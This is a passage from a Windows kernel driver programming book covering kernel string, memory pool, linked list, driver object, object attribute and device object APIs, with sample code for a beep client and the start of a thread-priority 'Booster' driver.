• RtlInitUnicodeString - Initializes a UNICODE_STRING based on an existing C-string pointer. It sets Buffer, then calculates the Length and sets MaximumLength to the same value. Note that this function does not allocate any memory - it just initializes the internal members.
• RtlCopyUnicodeString - Copies one UNICODE_STRING to another. The destination string pointer (Buffer) must be allocated before the copy and MaximumLength set appropriately.
• RtlCompareUnicodeString - Compares two UNICODE_STRINGs (equal, less, greater), specifying whether to do a case sensitive or insensitive comparison.
• RtlEqualUnicodeString - Compares two UNICODE_STRINGs for equality, with case sensitivity specification.
• RtlAppendUnicodeStringToString - Appends one UNICODE_STRING to another.
• RtlAppendUnicodeToString - Appends a C-style string to a UNICODE_STRING.
In addition to the above functions, there are functions that work on C-string pointers. Moreover, some of
the well-known string functions from the C Runtime Library are implemented within the kernel as well
for convenience: wcscpy_s, wcscat_s, wcslen, wcschr, strcpy, strcpy_s and others.
The wcs prefix works with C Unicode strings, while the str prefix works with C Ansi strings. The
suffix _s in some functions indicates a safe function, where an additional argument indicating
the maximum length of the string must be provided so the function would not transfer more
data than that size.
Never use the non-safe functions. You can include <dontuse.h> to get errors for deprecated
functions if you do use these in code.
Dynamic Memory Allocation
Drivers often need to allocate memory dynamically. As discussed in chapter 1, kernel thread stack size is
rather small, so any large chunk of memory should be allocated dynamically.
The kernel provides two general memory pools for drivers to use (the kernel itself uses them as well).
• Paged pool - memory pool that can be paged out if required.
• Non-Paged Pool - memory pool that is never paged out and is guaranteed to remain in RAM.
Clearly, the non-paged pool is a “better” memory pool as it can never incur a page fault. We’ll see
later in this book that some cases require allocating from non-paged pool. Drivers should use this pool
sparingly, only when necessary. In all other cases, drivers should use the paged pool. The POOL_TYPE
enumeration represents the pool types. This enumeration includes many “types” of pools, but only three
should be used by drivers: PagedPool, NonPagedPool, NonPagedPoolNx (non-paged pool without
execute permissions).
Table 3-4 summarizes the most common functions used for working with the kernel memory pools.
Table 3-4: Functions for kernel memory pool allocation

• ExAllocatePool - Allocates memory from one of the pools with a default tag. This function is considered obsolete; the next function in this table should be used instead.
• ExAllocatePoolWithTag - Allocates memory from one of the pools with the specified tag.
• ExAllocatePoolZero - Same as ExAllocatePoolWithTag, but zeroes out the memory block.
• ExAllocatePoolWithQuotaTag - Allocates memory from one of the pools with the specified tag and charges the current process quota for the allocation.
• ExFreePool - Frees an allocation. The function knows from which pool the allocation was made.
ExAllocatePool calls ExAllocatePoolWithTag using the tag 'enoN' (the word “none” in
reverse). Older Windows versions used the tag ' mdW' (WDM in reverse). You should avoid
this function and use ExAllocatePoolWithTag instead.
ExAllocatePoolZero is implemented inline in wdm.h by calling
ExAllocatePoolWithTag and adding the POOL_ZERO_ALLOCATION (=1024) flag to
the pool type.
Other memory management functions are covered in chapter 8, “Advanced Programming Techniques”.
The tag argument allows “tagging” an allocation with a 4-byte value. Typically this value is comprised
of up to 4 ASCII characters logically identifying the driver, or some part of the driver. These tags can be
used to help identify memory leaks - if any allocations tagged with the driver’s tag remain after the driver
is unloaded. These pool allocations (with their tags) can be viewed with the Poolmon WDK tool, or my
own PoolMonXv2 tool (downloadable from http://www.github.com/zodiacon/AllTools). Figure 3-1 shows
a screenshot of PoolMonXv2.
Figure 3-1: PoolMonXv2
You must use tags comprised of printable ASCII characters. Otherwise, running the driver
under the control of the Driver Verifier (described in chapter 11) would lead to Driver Verifier
complaining.
The following code example shows memory allocation and string copying to save the registry path passed
to DriverEntry, and freeing that string in the Unload routine:
// define a tag (because of little endianness, viewed as 'abcd')
#define DRIVER_TAG 'dcba'
UNICODE_STRING g_RegistryPath;
extern "C" NTSTATUS
DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath) {
UNREFERENCED_PARAMETER(DriverObject);
DriverObject->DriverUnload = SampleUnload;
g_RegistryPath.Buffer = (WCHAR*)ExAllocatePoolWithTag(PagedPool,
RegistryPath->Length, DRIVER_TAG);
if (g_RegistryPath.Buffer == nullptr) {
KdPrint(("Failed to allocate memory\n"));
return STATUS_INSUFFICIENT_RESOURCES;
}
g_RegistryPath.MaximumLength = RegistryPath->Length;
RtlCopyUnicodeString(&g_RegistryPath,
(PCUNICODE_STRING)RegistryPath);
// %wZ is for UNICODE_STRING objects
KdPrint(("Original registry path: %wZ\n", RegistryPath));
KdPrint(("Copied registry path: %wZ\n", &g_RegistryPath));
//...
return STATUS_SUCCESS;
}
void SampleUnload(_In_ PDRIVER_OBJECT DriverObject) {
UNREFERENCED_PARAMETER(DriverObject);
ExFreePool(g_RegistryPath.Buffer);
KdPrint(("Sample driver Unload called\n"));
}
Linked Lists
The kernel uses circular doubly linked lists in many of its internal data structures. For example, all processes
on the system are managed by EPROCESS structures, connected in a circular doubly linked list, whose
head is stored in the kernel variable PsActiveProcessHead.
All these lists are built in the same way, centered around the LIST_ENTRY structure defined like so:
typedef struct _LIST_ENTRY {
struct _LIST_ENTRY *Flink;
struct _LIST_ENTRY *Blink;
} LIST_ENTRY, *PLIST_ENTRY;
Figure 3-2 depicts an example of such a list containing a head and three instances.
Figure 3-2: Circular linked list
One such structure is embedded inside the real structure of interest. For example, in the EPROCESS
structure, the member ActiveProcessLinks is of type LIST_ENTRY, pointing to the next and previous
LIST_ENTRY objects of other EPROCESS structures. The head of a list is stored separately; in the case of
the process, that’s PsActiveProcessHead.
The pointer to the actual structure of interest, given the address of the LIST_ENTRY it embeds, can be
obtained with the CONTAINING_RECORD macro.
For example, suppose you want to manage a list of structures of type MyDataItem defined like so:
struct MyDataItem {
// some data members
LIST_ENTRY Link;
// more data members
};
When working with these linked lists, we have a head for the list, stored in a variable. This means that
natural traversal is done by using the Flink member of the list to point to the next LIST_ENTRY in the
list. Given a pointer to the LIST_ENTRY, what we’re really after is the MyDataItem that contains this
list entry member. This is where the CONTAINING_RECORD comes in:
MyDataItem* GetItem(LIST_ENTRY* pEntry) {
return CONTAINING_RECORD(pEntry, MyDataItem, Link);
}
The macro performs the proper offset calculation and casts the result to the actual data type (MyDataItem in
the example).
Table 3-5 shows the common functions for working with these linked lists. All operations take constant
time.
Table 3-5: Functions for working with circular linked lists

• InitializeListHead - Initializes a list head to make an empty list. The forward and back pointers point to the list head itself.
• InsertHeadList - Inserts an item at the head of the list.
• InsertTailList - Inserts an item at the tail of the list.
• IsListEmpty - Checks if the list is empty.
• RemoveHeadList - Removes the item at the head of the list.
• RemoveTailList - Removes the item at the tail of the list.
• RemoveEntryList - Removes a specific item from the list.
• ExInterlockedInsertHeadList - Inserts an item at the head of the list atomically by using the specified spinlock.
• ExInterlockedInsertTailList - Inserts an item at the tail of the list atomically by using the specified spinlock.
• ExInterlockedRemoveHeadList - Removes an item from the head of the list atomically by using the specified spinlock.
The last three functions in table 3-5 perform the operation atomically using a synchronization primitive
called a spin lock. Spin locks are discussed in chapter 6.
The Driver Object
We’ve already seen that the DriverEntry function accepts two arguments, the first is a driver object
of some kind. This is a semi-documented structure called DRIVER_OBJECT defined in the WDK headers.
“Semi-documented” means that some of its members are documented for drivers’ use and some are not.
This structure is allocated by the kernel and partially initialized. Then it’s provided to DriverEntry (and
before the driver unloads to the Unload routine as well). The role of the driver at this point is to further
initialize the structure to indicate what operations are supported by the driver.
We’ve seen one such “operation” in chapter 2 - the Unload routine. The other important set of operations
to initialize are called Dispatch Routines. This is an array of function pointers, stored in the
MajorFunction member of DRIVER_OBJECT. This set specifies which operations the driver supports,
such as Create, Read, Write, and so on. These indices are defined with the IRP_MJ_ prefix. Table 3-6 shows
some common major function codes and their meaning.
Table 3-6: Common major function codes

• IRP_MJ_CREATE (0) - Create operation. Typically invoked for CreateFile or ZwCreateFile calls.
• IRP_MJ_CLOSE (2) - Close operation. Normally invoked for CloseHandle or ZwClose.
• IRP_MJ_READ (3) - Read operation. Typically invoked for ReadFile, ZwReadFile and similar read APIs.
• IRP_MJ_WRITE (4) - Write operation. Typically invoked for WriteFile, ZwWriteFile, and similar write APIs.
• IRP_MJ_DEVICE_CONTROL (14) - Generic call to a driver, invoked because of DeviceIoControl or ZwDeviceIoControlFile calls.
• IRP_MJ_INTERNAL_DEVICE_CONTROL (15) - Similar to the previous one, but only available for kernel-mode callers.
• IRP_MJ_SHUTDOWN (16) - Called when the system shuts down if the driver has registered for shutdown notification with IoRegisterShutdownNotification.
• IRP_MJ_CLEANUP (18) - Invoked when the last handle to a file object is closed, but the file object’s reference count is not zero.
• IRP_MJ_POWER (22) - Power callback invoked by the Power Manager. Generally interesting for hardware-based drivers or filters to such drivers.
• IRP_MJ_PNP (27) - Plug and play callback invoked by the Plug and Play Manager. Generally interesting for hardware-based drivers or filters to such drivers.
Initially, the MajorFunction array is initialized by the kernel to point to a kernel internal routine,
IopInvalidDeviceRequest, which returns a failure status to the caller, indicating the operation is
not supported. This means the driver, in its DriverEntry routine, only needs to initialize the actual
operations it supports, leaving all the other entries at their default values.
For example, our Sample driver at this point does not support any dispatch routines, which means there is
no way to communicate with the driver. A driver must at least support the IRP_MJ_CREATE and
IRP_MJ_CLOSE operations, to allow opening a handle to one of the device objects for the driver. We’ll put these
ideas into practice in the next chapter.
Object Attributes
One of the common structures that shows up in many kernel APIs is OBJECT_ATTRIBUTES, defined like
so:
typedef struct _OBJECT_ATTRIBUTES {
    ULONG Length;
    HANDLE RootDirectory;
    PUNICODE_STRING ObjectName;
    ULONG Attributes;
    PVOID SecurityDescriptor;        // SECURITY_DESCRIPTOR
    PVOID SecurityQualityOfService;  // SECURITY_QUALITY_OF_SERVICE
} OBJECT_ATTRIBUTES;
typedef OBJECT_ATTRIBUTES *POBJECT_ATTRIBUTES;
typedef CONST OBJECT_ATTRIBUTES *PCOBJECT_ATTRIBUTES;
The structure is typically initialized with the InitializeObjectAttributes macro, which allows
specifying all the structure members except Length (set automatically by the macro) and
SecurityQualityOfService, which is not normally needed. Here is a description of the members:
• ObjectName is the name of the object to be created/located, provided as a pointer to a
UNICODE_STRING. In some cases it may be ok to set it to NULL. For example, ZwOpenProcess allows
opening a handle to a process given its PID. Since processes don’t have names, the ObjectName in
this case should be initialized to NULL.
• RootDirectory is an optional directory in the object manager namespace if the name of the object
is a relative one. If ObjectName specifies a fully-qualified name, RootDirectory should be set to
NULL.
• Attributes allows specifying a set of flags that affect the operation in question. Table 3-7
shows the defined flags and their meaning.
• SecurityDescriptor is an optional security descriptor (SECURITY_DESCRIPTOR) to set on the
newly created object. NULL indicates the new object gets a default security descriptor, based on the
caller’s token.
• SecurityQualityOfService is an optional set of attributes related to the new object’s imper-
sonation level and context tracking mode. It has no meaning for most object types. Consult the
documentation for more information.
Table 3-7: Object attributes flags

• OBJ_INHERIT (2) - The returned handle should be marked as inheritable.
• OBJ_PERMANENT (0x10) - The object created should be marked as permanent. Permanent objects have an additional reference count that prevents them from dying even if all handles to them are closed.
• OBJ_EXCLUSIVE (0x20) - If creating an object, the object is created with exclusive access; no other handles can be opened to the object. If opening an object, exclusive access is requested, which is granted only if the object was originally created with this flag.
• OBJ_CASE_INSENSITIVE (0x40) - When opening an object, perform a case insensitive search for its name. Without this flag, the name must match exactly.
• OBJ_OPENIF (0x80) - Open the object if it exists. Otherwise, fail the operation (don’t create a new object).
• OBJ_OPENLINK (0x100) - If the object to open is a symbolic link object, open the symbolic link object itself, rather than following the symbolic link to its target.
• OBJ_KERNEL_HANDLE (0x200) - The returned handle should be a kernel handle. Kernel handles are valid in any process context, and cannot be used by user-mode code.
• OBJ_FORCE_ACCESS_CHECK (0x400) - Access checks should be performed even if the object is opened in KernelMode access mode.
• OBJ_IGNORE_IMPERSONATED_DEVICEMAP (0x800) - Use the process device map instead of the user’s if it’s impersonating (consult the documentation for more information on device maps).
• OBJ_DONT_REPARSE (0x1000) - Don’t follow a reparse point, if encountered. Instead an error is returned (STATUS_REPARSE_POINT_ENCOUNTERED). Reparse points are briefly discussed in chapter 11.
A second way to initialize an OBJECT_ATTRIBUTES structure is available with the
RTL_CONSTANT_OBJECT_ATTRIBUTES macro, which sets the two most commonly used members - the
object’s name and the attributes.
Let’s look at a couple of examples that use OBJECT_ATTRIBUTES. The first one is a function that opens
a handle to a process given its process ID. For this purpose, we’ll use the ZwOpenProcess API, defined
like so:
NTSTATUS ZwOpenProcess (
    _Out_ PHANDLE ProcessHandle,
    _In_ ACCESS_MASK DesiredAccess,
    _In_ POBJECT_ATTRIBUTES ObjectAttributes,
    _In_opt_ PCLIENT_ID ClientId);
It uses yet another common structure, CLIENT_ID that holds a process and/or a thread ID:
typedef struct _CLIENT_ID {
    HANDLE UniqueProcess;   // PID, not handle
    HANDLE UniqueThread;    // TID, not handle
} CLIENT_ID;
typedef CLIENT_ID *PCLIENT_ID;
To open a process, we need to specify the process ID in the UniqueProcess member. Note that although
the type of UniqueProcess is HANDLE, it is the unique ID of the process. The reason for the HANDLE type
is that process and thread IDs are generated from a private handle table. This also explains why process
and thread IDs are always a multiple of four (just like normal handles), and why they don’t overlap.
With these details at hand, here is a process opening function:
NTSTATUS
OpenProcess(ACCESS_MASK accessMask, ULONG pid, PHANDLE phProcess) {
CLIENT_ID cid;
cid.UniqueProcess = ULongToHandle(pid);
cid.UniqueThread = nullptr;
OBJECT_ATTRIBUTES procAttributes =
RTL_CONSTANT_OBJECT_ATTRIBUTES(nullptr, OBJ_KERNEL_HANDLE);
return ZwOpenProcess(phProcess, accessMask, &procAttributes, &cid);
}
The ULongToHandle function performs the required casts so that the compiler is happy (HANDLE is
64-bit on a 64-bit system, but ULONG is always 32-bit). The only member used in the above code from
OBJECT_ATTRIBUTES is the Attributes flags.
The second example is a function that opens a handle to a file for read access, by using the ZwOpenFile
API, defined like so:
NTSTATUS ZwOpenFile(
    _Out_ PHANDLE FileHandle,
    _In_ ACCESS_MASK DesiredAccess,
    _In_ POBJECT_ATTRIBUTES ObjectAttributes,
    _Out_ PIO_STATUS_BLOCK IoStatusBlock,
    _In_ ULONG ShareAccess,
    _In_ ULONG OpenOptions);
A full discussion of the parameters to ZwOpenFile is reserved for chapter 11, but one thing is obvious:
the file name itself is specified using the OBJECT_ATTRIBUTES structure - there is no separate parameter
for that. Here is the full function opening a handle to a file for read access:
NTSTATUS OpenFileForRead(PCWSTR path, PHANDLE phFile) {
UNICODE_STRING name;
RtlInitUnicodeString(&name, path);
OBJECT_ATTRIBUTES fileAttributes;
InitializeObjectAttributes(&fileAttributes, &name,
OBJ_CASE_INSENSITIVE | OBJ_KERNEL_HANDLE, nullptr, nullptr);
IO_STATUS_BLOCK ioStatus;
return ZwOpenFile(phFile, FILE_GENERIC_READ,
&fileAttributes, &ioStatus, FILE_SHARE_READ, 0);
}
InitializeObjectAttributes is used to initialize the OBJECT_ATTRIBUTES structure, although the
RTL_CONSTANT_OBJECT_ATTRIBUTES could have been used just as well, since we’re only specifying
the name and attributes. Notice the need to turn the passed-in NULL-terminated C-string pointer into a
UNICODE_STRING with RtlInitUnicodeString.
Device Objects
Although a driver object may look like a good candidate for clients to talk to, this is not the case. The
actual communication endpoints for clients are device objects. Device objects are instances of the semi-
documented DEVICE_OBJECT structure. Without device objects, there is no one to talk to. This means
that at least one device object should be created by the driver and given a name, so that it may be contacted
by clients.
The CreateFile function (and its variants) accepts a first argument which is called “file name” in the
documentation, but really this should point to a device object’s name, where an actual file system file is
just one particular case. The name CreateFile is somewhat misleading - the word “file” here means
“file object”. Opening a handle to a file or device creates an instance of the kernel structure FILE_OBJECT,
another semi-documented structure.
More precisely, CreateFile accepts a symbolic link, a kernel object that knows how to point to another
kernel object. (You can think of a symbolic link as similar in principle to a file system shortcut.) All the
symbolic links that can be used from the user mode CreateFile or CreateFile2 calls are located in
the Object Manager directory named ??. You can see the contents of this directory with the Sysinternals
WinObj tool. Figure 3-3 shows this directory (named Global?? in WinObj).
Figure 3-3: Symbolic links directory in WinObj
Some of the names seem familiar, such as C:, Aux, Con, and others. Indeed, these are valid “file names”
for CreateFile calls. Other entries look like long cryptic strings, and these in fact are generated by the
I/O system for hardware-based drivers that call the IoRegisterDeviceInterface API. These types
of symbolic links are not useful for the purpose of this book.
Most of the symbolic links in the \?? directory point to an internal device name under the \Device directory.
The names in this directory are not directly accessible by user-mode callers. But they can be accessed by
kernel callers using the IoGetDeviceObjectPointer API.
A canonical example is the driver for Process Explorer. When Process Explorer is launched with
administrator rights, it installs a driver. This driver gives Process Explorer powers beyond those that can
be obtained by user-mode callers, even if running elevated. For example, Process Explorer in its Threads
dialog for a process can show the complete call stack of a thread, including functions in kernel mode. This
type of information is not possible to obtain from user mode; its driver provides the missing information.
The driver installed by Process Explorer creates a single device object so that Process Explorer is able to
open a handle to that device and make requests. This means that the device object must be named, and
must have a symbolic link in the ?? directory; and it’s there, called PROCEXP152, probably indicating
driver version 15.2 (at the time of writing). Figure 3-4 shows this symbolic link in WinObj.
Figure 3-4: Process Explorer’s symbolic link in WinObj
Notice the symbolic link for Process Explorer’s device points to \Device\PROCEXP152, which is the
internal name only accessible to kernel callers (and the native APIs NtOpenFile and NtCreateFile,
as shown in the next section). The actual CreateFile call made by Process Explorer (or any other client)
based on the symbolic link must be prepended with \\.\. This is necessary so that the I/O manager’s
parser will not assume the string “PROCEXP152” refers to a file with no extension in the current directory.
Here is how Process Explorer would open a handle to its device object (note the double backslashes because
of the backslash being an escape character in C/C++):
HANDLE hDevice = CreateFile(L"\\\\.\\PROCEXP152",
GENERIC_WRITE | GENERIC_READ, 0, nullptr, OPEN_EXISTING,
0, nullptr);
With C++ 11 and later, you can write strings without escaping the backslash character. The
device path in the above code can be written like so: LR"(\\.\PROCEXP152)". L indicates
Unicode (as always), while anything between R"( and )" is not escaped.
You can try the above code yourself. If Process Explorer has run elevated at least once on the system
since boot, its driver should be running (you can verify with the tool itself), and the call to CreateFile
will succeed if the client is running elevated.
A driver creates a device object using the IoCreateDevice function. This function allocates and
initializes a device object structure and returns its pointer to the caller. The device object instance is
stored in the DeviceObject member of the DRIVER_OBJECT structure. If more than one device object
is created, they form a singly linked list, where the member NextDevice of the DEVICE_OBJECT points
to the next device object. Note that the device objects are inserted at the head of the list, so the first device
object created is stored last; its NextDevice points to NULL. These relationships are depicted in figure
3-5.
Figure 3-5: Driver and Device objects
Opening Devices Directly
The existence of a symbolic link makes it easy to open a handle to a device with the documented
CreateFile user-mode API (or from the ZwOpenFile API in the kernel). It is sometimes useful,
however, to be able to open device objects without going through a symbolic link. For example, a device
object might not have a symbolic link, because its driver decided (for whatever reason) not to provide one.
The native NtOpenFile (and NtCreateFile) function can be used to open a device object directly.
Microsoft never recommends using native APIs, but this function is somewhat documented for user-mode
use. Its definition is available in the <Winternl.h> header file:
NTSTATUS NTAPI NtOpenFile (
    OUT PHANDLE FileHandle,
    IN ACCESS_MASK DesiredAccess,
    IN POBJECT_ATTRIBUTES ObjectAttributes,
    OUT PIO_STATUS_BLOCK IoStatusBlock,
    IN ULONG ShareAccess,
    IN ULONG OpenOptions);
Notice the similarity to the ZwOpenFile we used in an earlier section - this is the same function prototype,
just invoked here from user mode, eventually to land at NtOpenFile within the I/O manager. The function
requires usage of an OBJECT_ATTRIBUTES structure, described earlier in this chapter.
The above prototype uses old annotation macros such as IN and OUT. These have since been replaced by
SAL annotations; unfortunately, some header files have not yet been converted to SAL.
To demonstrate using NtOpenFile from user mode, we’ll create an application to play a single sound.
Normally, the Beep Windows user-mode API provides such a service:
BOOL Beep(
_In_ DWORD dwFreq,
_In_ DWORD dwDuration);
The function accepts the frequency to play (in Hertz), and the duration to play, in milliseconds. The
function is synchronous, meaning it does not return until the duration has elapsed.
The Beep API works by calling a device named \Device\Beep (you can find it in WinObj), but the beep
device driver does not create a symbolic link for it. However, we can open a handle to the beep device
using NtOpenFile. Then, to play a sound, we can use the DeviceIoControl function with the correct
parameters. Although it’s not too difficult to reverse engineer the beep driver workings, fortunately we
don’t have to. The SDK provides the <ntddbeep.h> file with the required definitions, including the device
name itself.
We’ll start by creating a C++ Console application in Visual Studio. Before we get to the main function, we
need some #includes:
#include <Windows.h>
#include <winternl.h>
#include <stdio.h>
#include <ntddbeep.h>
<winternl.h> provides the definition for NtOpenFile (and related data structures), while <ntddbeep.h>
provides the beep-specific definitions.
Since we will be using NtOpenFile, we must also link against NtDll.Dll, which we can do by adding a
#pragma to the source code, or add the library to the linker settings in the project’s properties. Let’s go
with the former, as it’s easier, and is not tied to the project’s properties:
#pragma comment(lib, "ntdll")
Without the above linkage, the linker would issue an “unresolved external” error.
Now we can start writing main, where we accept optional command line arguments indicating the
frequency and duration to play:
int main(int argc, const char* argv[]) {
printf("beep [<frequency> <duration_in_msec>]\n");
int freq = 800, duration = 1000;
if (argc > 2) {
freq = atoi(argv[1]);
duration = atoi(argv[2]);
}
The next step is to open the device handle using NtOpenFile:
HANDLE hFile;
OBJECT_ATTRIBUTES attr;
UNICODE_STRING name;
RtlInitUnicodeString(&name, L"\\Device\\Beep");
InitializeObjectAttributes(&attr, &name, OBJ_CASE_INSENSITIVE,
nullptr, nullptr);
IO_STATUS_BLOCK ioStatus;
NTSTATUS status = ::NtOpenFile(&hFile, GENERIC_WRITE, &attr, &ioStatus, 0, 0);
The line to initialize the device name can be replaced with:
RtlInitUnicodeString(&name, DD_BEEP_DEVICE_NAME_U);
The DD_BEEP_DEVICE_NAME_U macro is conveniently supplied as part of <ntddbeep.h>.
If the call succeeds, we can play the sound. To do that, we call DeviceIoControl with a control code
defined in <ntddbeep.h> and use a structure defined there as well to fill in the frequency and duration:
if (NT_SUCCESS(status)) {
BEEP_SET_PARAMETERS params;
params.Frequency = freq;
params.Duration = duration;
DWORD bytes;
//
// play the sound
//
printf("Playing freq: %u, duration: %u\n", freq, duration);
::DeviceIoControl(hFile, IOCTL_BEEP_SET, &params, sizeof(params),
nullptr, 0, &bytes, nullptr);
//
// the sound starts playing and the call returns immediately
// Wait so that the app doesn't close
//
::Sleep(duration);
::CloseHandle(hFile);
}
The input buffer passed to DeviceIoControl should be a BEEP_SET_PARAMETERS structure, which
we pass in along with its size. The last piece of the puzzle is to use the Sleep API to wait based on the
duration, otherwise the handle to the device would be closed and the sound cut off.
Write an application that plays an array of sounds by leveraging the above code.
Summary
In this chapter, we looked at some of the fundamental kernel data structures, concepts, and APIs. In the next
chapter, we’ll build a complete driver, and a client application, expanding on the information presented
thus far.
Chapter 4: Driver from Start to Finish
In this chapter, we’ll use many of the concepts we learned in previous chapters and build a simple, yet
complete, driver, and an associated client application, while filling in some of the missing details from
previous chapters. We’ll deploy the driver and use its capabilities to perform an operation in kernel
mode that is difficult, or even impossible, to do in user mode.
In this chapter:
• Introduction
• Driver Initialization
• Client Code
• The Create and Close Dispatch Routines
• The Write Dispatch Routine
• Installing and Testing
Introduction
The problem we’ll solve with a simple kernel driver is the inflexibility of setting thread priorities using
the Windows API. In user mode, a thread’s priority is determined by a combination of its process priority
class and a per-thread offset, which allows only a limited number of levels.
Changing a process priority class (shown as Base priority column in Task Manager) can be achieved with
the SetPriorityClass function that accepts a process handle and one of the six supported priority
classes. Each priority class corresponds to a priority level, which is the default priority for threads created
in that process. A particular thread’s priority can be changed with the SetThreadPriority function,
accepting a thread handle and one of several constants corresponding to offsets around the base priority
class. Table 4-1 shows the available thread priorities based on the process priority class and the thread’s
priority offset.
Table 4-1: Legal values for thread priorities with the Windows APIs

Priority Class   -Sat   -2   -1   0 (default)   +1   +2   +Sat   Comments
Idle               1     2    3        4         5    6    15    Task Manager refers to Idle as “Low”
Below Normal       1     4    5        6         7    8    15
Normal             1     6    7        8         9   10    15
Above Normal       1     8    9       10        11   12    15
High               1    11   12       13        14   15    15    Only six levels are available (not seven)
Real-time         16    22   23       24        25   26    31    All levels between 16 and 31 can be selected
The values acceptable to SetThreadPriority specify the offset. Five levels correspond to the offsets
-2 to +2: THREAD_PRIORITY_LOWEST (-2), THREAD_PRIORITY_BELOW_NORMAL (-1), THREAD_PRIORITY_NORMAL (0),
THREAD_PRIORITY_ABOVE_NORMAL (+1), THREAD_PRIORITY_HIGHEST (+2). The remaining two levels, called
Saturation levels, set the priority to the two extremes supported by that priority class:
THREAD_PRIORITY_IDLE (-Sat) and THREAD_PRIORITY_TIME_CRITICAL (+Sat).
The following code example changes the current thread’s priority to 11:
SetPriorityClass(GetCurrentProcess(),
    ABOVE_NORMAL_PRIORITY_CLASS);     // process base=10
SetThreadPriority(GetCurrentThread(),
    THREAD_PRIORITY_ABOVE_NORMAL);    // +1 offset for thread
The Real-time priority class does not imply Windows is a real-time OS; Windows does not
provide some of the timing guarantees normally provided by true real-time operating systems.
Also, since Real-time priorities are very high and compete with many kernel threads doing
important work, such a process must be running with administrator privileges; otherwise,
attempting to set the priority class to Real-time causes the value to be set to High.
There are other differences between the real-time priorities and the lower priority classes.
Consult the Windows Internals book for more information.
Table 4-1 shows the problem we will address quite clearly. Only a small set of priorities are available to
set directly. We would like to create a driver that would circumvent these limitations and allow setting a
thread’s priority to any number, regardless of its process priority class.
Driver Initialization
We’ll start building the driver in the same way we did in chapter 2. Create a new “WDM Empty Project”
named Booster (or another name of your choosing) and delete the INF file created by the wizard. Next,
add a new source file to the project, called Booster.cpp (or any other name you prefer). Add the basic
#include for the main WDK header and an almost empty DriverEntry:
#include <ntddk.h>
extern "C" NTSTATUS
DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath) {
return STATUS_SUCCESS;
}
Most software drivers need to do the following in DriverEntry:
• Set an Unload routine.
• Set dispatch routines the driver supports.
• Create a device object.
• Create a symbolic link to the device object.
Once all these operations are performed, the driver is ready to take requests.
The first step is to add an Unload routine and point to it from the driver object. Here is the new
DriverEntry with the Unload routine:
// prototypes
void BoosterUnload(PDRIVER_OBJECT DriverObject);
// DriverEntry
extern "C" NTSTATUS
DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath) {
DriverObject->DriverUnload = BoosterUnload;
return STATUS_SUCCESS;
}
void BoosterUnload(PDRIVER_OBJECT DriverObject) {
// empty for now
}
We’ll add code to the Unload routine as needed when we do actual work in DriverEntry that needs to
be undone.
Next, we need to set up the dispatch routines that we want to support. Practically all drivers must support
IRP_MJ_CREATE and IRP_MJ_CLOSE, otherwise there would be no way to open a handle to any device
for this driver. So we add the following to DriverEntry:
DriverObject->MajorFunction[IRP_MJ_CREATE] = BoosterCreateClose;
DriverObject->MajorFunction[IRP_MJ_CLOSE]  = BoosterCreateClose;
We’re pointing the Create and Close major functions to the same routine. This is because, as we’ll see
shortly, they will do the same thing: simply approve the request. In more complex cases, these could be
separate functions, where in the Create case the driver can (for instance) check to see who the caller is and
only let approved callers succeed with opening a handle.
All major functions have the same prototype (they are part of an array of function pointers), so we have
to add a prototype for BoosterCreateClose. The prototype for these functions is as follows:
NTSTATUS BoosterCreateClose(PDEVICE_OBJECT DeviceObject, PIRP Irp);
The function must return NTSTATUS, and accepts a pointer to a device object and a pointer to an I/O
Request Packet (IRP). An IRP is the primary object where the request information is stored, for all types
of requests. We’ll dig deeper into an IRP in chapter 7, but we’ll look at the basics later in this chapter, since
we require it to complete our driver.
Passing Information to the Driver
The Create and Close operations we set up are required, but certainly not enough. We need a way to tell
the driver which thread and to what value to set its priority. From a user mode client’s perspective, there
are three basic functions it can use: WriteFile, ReadFile and DeviceIoControl.
For our driver’s purposes, we can use either WriteFile or DeviceIoControl. Read doesn’t make
sense, because we’re passing information to the driver, rather than from the driver. So which is better,
WriteFile or DeviceIoControl? This is mostly a matter of taste, but the general wisdom here is to
use Write if it’s really a write operation (logically); for anything else - DeviceIoControl is preferred,
as it’s a generic mechanism for passing data to and from the driver.
Since changing a thread’s priority is not a purely Write operation, DeviceIoControl makes more sense,
but we’ll use WriteFile, as it’s a bit easier to handle. We’ll look at all the details in chapter 7. WriteFile
has the following prototype:
BOOL WriteFile(
    _In_ HANDLE hFile,
    _In_reads_bytes_opt_(nNumberOfBytesToWrite) LPCVOID lpBuffer,
    _In_ DWORD nNumberOfBytesToWrite,
    _Out_opt_ LPDWORD lpNumberOfBytesWritten,
    _Inout_opt_ LPOVERLAPPED lpOverlapped);
Our driver has to export its handling of a write operation capability by assigning a function pointer to the
IRP_MJ_WRITE index of the MajorFunction array in the driver object:
DriverObject->MajorFunction[IRP_MJ_WRITE] = BoosterWrite;
BoosterWrite must have the same prototype as all major function code handlers:
NTSTATUS BoosterWrite(PDEVICE_OBJECT DeviceObject, PIRP Irp);
Client / Driver Communication Protocol
Given that we use WriteFile for client/driver communication, we now must define the actual semantics.
WriteFile allows passing in a buffer, for which we need to define proper semantics. This buffer should
contain the two pieces of information required so the driver can do its thing: the thread id and the priority
to set for it.
These pieces of information must be usable both by the driver and the client. The client would supply the
data, and the driver would act on it. This means these definitions must be in a separate file that must be
included by both the driver and client code.
For this purpose, we’ll add a header file named BoosterCommon.h to the driver project. This file will also
be used later by the user-mode client.
Within this file, we need to define the data structure to pass to the driver in the WriteFile buffer,
containing the thread ID and the priority to set:
struct ThreadData {
ULONG ThreadId;
int Priority;
};
We need the thread’s unique ID and the target priority. Thread IDs are 32-bit unsigned integers, so we
select ULONG as the type. The priority should be a number between 1 and 31, so a simple 32-bit integer
will do.
We cannot normally use DWORD - a common type defined in user mode headers - because it’s not defined
in kernel mode headers. ULONG, on the other hand, is defined in both. It would be easy enough to define
it ourselves, but ULONG is the same anyway.
Creating the Device Object
We have more initializations to do in DriverEntry. Currently, we don’t have any device object and so
there is no way to open a handle and reach the driver. A typical software driver needs just one device object,
with a symbolic link pointing to it, so that user-mode clients can obtain handles easily with CreateFile.
Creating the device object requires calling the IoCreateDevice API, declared as follows (some SAL
annotations omitted/simplified for clarity):
NTSTATUS IoCreateDevice(
    _In_     PDRIVER_OBJECT DriverObject,
    _In_     ULONG DeviceExtensionSize,
    _In_opt_ PUNICODE_STRING DeviceName,
    _In_     DEVICE_TYPE DeviceType,
    _In_     ULONG DeviceCharacteristics,
